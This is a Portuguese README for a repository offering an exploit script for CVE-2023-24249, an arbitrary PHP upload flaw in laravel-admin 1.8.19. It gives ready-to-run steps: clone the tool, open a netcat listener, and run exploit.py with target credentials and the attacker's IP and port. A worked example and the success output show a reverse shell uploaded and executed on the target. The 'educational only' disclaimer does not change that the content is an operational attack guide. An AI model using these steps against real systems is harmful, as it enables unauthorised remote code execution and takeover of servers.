
Script de exploit para CVE-2023-24249 - uma vulnerabilidade que permite execução remota de código via upload de arquivos e injeção de comandos.
Este repositório contém um script de exploit para a CVE-2023-24249, uma vulnerabilidade crítica encontrada no laravel-admin versão 1.8.19. Essa vulnerabilidade permite o upload arbitrário de arquivos, possibilitando que atacantes executem código arbitrário por meio de um arquivo PHP malicioso. O exploit demonstra como um atacante pode enviar uma reverse shell para o aplicativo alvo e executá-la para obter acesso remoto.
CVE-2023-24249 é uma vulnerabilidade de upload arbitrário de arquivos no laravel-admin v1.8.19. Essa vulnerabilidade permite que atacantes enviem e executem arquivos PHP arbitrários, levando a uma possível execução remota de código.
O script de exploit fornecido automatiza o processo de exploração da CVE-2023-24249. Ele executa as seguintes etapas:
requestsbeautifulsoup4Instale as bibliotecas necessárias usando pip:
pip install requests beautifulsoup4
Clone o repositório:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
Inicie um listener na sua máquina:
nc -lvnp <PORT>
Execute o script de exploit:
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
Substitua <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> e <YOUR_PORT> pelos valores apropriados:
<TARGET_URL>: A URL do aplicativo alvo.<USERNAME>: O nome de usuário para autenticação.<PASSWORD>: A senha para autenticação.<YOUR_IP>: Seu endereço IP para receber a conexão da reverse shell.<YOUR_PORT>: A porta na qual seu listener está executando.python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
Se o exploit for bem-sucedido, o script exibirá:
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
Este script destina-se apenas a fins educacionais. O uso não autorizado deste script contra qualquer sistema sem permissão explícita é ilegal e antiético. O autor não é responsável por qualquer uso indevido ou dano causado por este script.